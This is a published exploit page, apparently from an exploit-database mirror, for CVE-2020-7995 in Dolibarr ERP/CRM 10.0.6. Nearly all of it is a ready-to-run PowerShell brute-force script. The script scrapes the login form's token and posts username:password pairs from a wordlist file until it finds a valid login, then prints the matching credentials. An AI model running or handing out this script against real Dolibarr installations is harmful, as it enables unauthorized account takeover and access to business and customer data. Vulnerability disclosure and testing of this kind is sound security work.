Dolibarr ERP/CRM 10.0.6 Exploit, Login Brute Force

# Exploit Title: Dolibarr ERP/CRM 10.0.6 - Login Brute Force
# Date:2020-01-18
# Exploit Author: Creamy Chicken Soup
# Vendor Homepage: https://www.dolibarr.org
# Software Link: https://sourceforge.net/projects/dolibarr/
# Version: 10.0.6
# Tested on: Windows 10 - 64bit
# CVE: CVE-2020-7995

function brute($url,$username,$passwd){
try{
    $WebResponse = Invoke-WebRequest $url
    $a=$WebResponse.Forms.fields
    $fields=@{"token"=$a.token ;"loginfunction"=$a.loginfunction;"username"=$username;"password"=$passwd}
    $WebResponse1 = Invoke-WebRequest -Uri $url -Method Post -Body $fields
    if($WebResponse1.Forms.Id -ne "login"){
        Write-Host "username password is match"
        Write-Warning "user: $username ,passwoed: $passwd"
        return $true
       }
}catch{
    Write-Warning "Something Wrong!"
    }
}

function fileinput($filepath,$url){
    try{
        Write-Host "Target: $url"
        $fp=Get-Content -Path $filepath
        foreach($line in $fp){
            $s=$line -split ':'
            $username=$s[0]
            $passwd=$s[1]
            Write-Host "[+] Check $username : $passwd"
            $bf=brute $url $username $passwd
            if($bf -eq $True){
                break
            }
    }
    }catch{
        Write-Warning "File is error"
    }
}

$textart=@'
 ____  ____  _____ ____  _     ___  _ ____  _     _  ____  _  __ _____ _      ____  ____  _     ____ 
/   _\/  __\/  __//  _ \/ \__/|\  \///   _\/ \ /|/ \/   _\/ |/ //  __// \  /|/ ___\/  _ \/ \ /\/  __\
|  /  |  \/||  \  | / \|| |\/|| \  / |  /  | |_||| ||  /  |   / |  \  | |\ |||    \| / \|| | |||  \/|
|  \__|    /|  /_ | |-||| |  || / /  |  \__| | ||| ||  \_ |   \ |  /_ | | \||\___ || \_/|| \_/||  __/
\____/\_/\_\\____\\_/ \|\_/  \|/_/   \____/\_/ \|\_/\____/\_|\_\\____\\_/  \|\____/\____/\____/\_/   
                                                                                                     
'@

Write-Host $textart
Write-Host @'
Exploit Title: DOLIBARR ERP/CRM - Brute Force Vulnerability
Date: 2020-01-18
Exploit Author: CreamyChickenSoup
Vendor Homepage: https://www.dolibarr.org
Version: 10.0.6
CVE: CVE-2020-7995
Vulnerable Page : http://localhost/htdocs/index.php?mainmenu=home
Twitter: @creamychickens1
cve submited:Tufan Gungor
'@
$url=Read-Host "Enter Url:"
$filepath=Read-Host "Enter FilePAth: (File content like : user:pass)"
fileinput $filepath $url

Credits and Partners

All rights reserved nPulse.net 2009 - 2024
Powered by: MVCP 2.0-RC / BVCP / ASPF-MILTER / PHP 7.4 / NGINX / FreeBSD